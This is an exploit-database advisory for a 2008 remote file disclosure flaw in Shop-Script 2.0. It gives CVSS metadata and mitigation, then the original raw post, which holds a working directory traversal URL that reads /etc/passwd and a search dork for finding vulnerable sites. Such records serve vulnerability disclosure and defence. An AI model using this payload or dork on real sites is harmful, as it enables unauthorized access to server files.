Shop-Script 2.0 index.php Remote File Disclosure Vuln

vendor:

Shop-Script 2.0

by:

Fisher762

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: Shop-Script 2.0

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: N/A

CPE: a:shop-script:shop-script:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Shop-Script 2.0 index.php Remote File Disclosure Vuln

A vulnerability exists in Shop-Script 2.0 which allows an attacker to disclose sensitive information by sending a specially crafted HTTP request containing directory traversal sequences. An attacker can exploit this vulnerability to view arbitrary files on the target system.

Mitigation:

Upgrade to the latest version of Shop-Script 2.0 or apply the appropriate patch.

Source

Exploit-DB raw data:

#########################################################################
        Shop-Script 2.0 index.php Remote File Disclosure Vuln

#########################################################################
Script:Shop-Script 2.0

Download : ??

AUTHOR :Fisher762 From S.M.A TEAM

Contact Me: fisher.762@hotmail.com

HOME : http://www.v99x.com/vb


DorKs :" Shop-Script 2.0. All rights reserved"


###########################################################################
## EXPLOIT :
http://site.com/Script/index.php?aux_page=../../../../../etc/passwd

###########################################################################

############################################################################

## GREETZ T0 : Fisher762 ,Abo Hmza ,Ev!l3-K!ll3r,HaCk-TrOjAn And all S.M.A TEAM

########################################################################### 

# milw0rm.com [2008-01-06]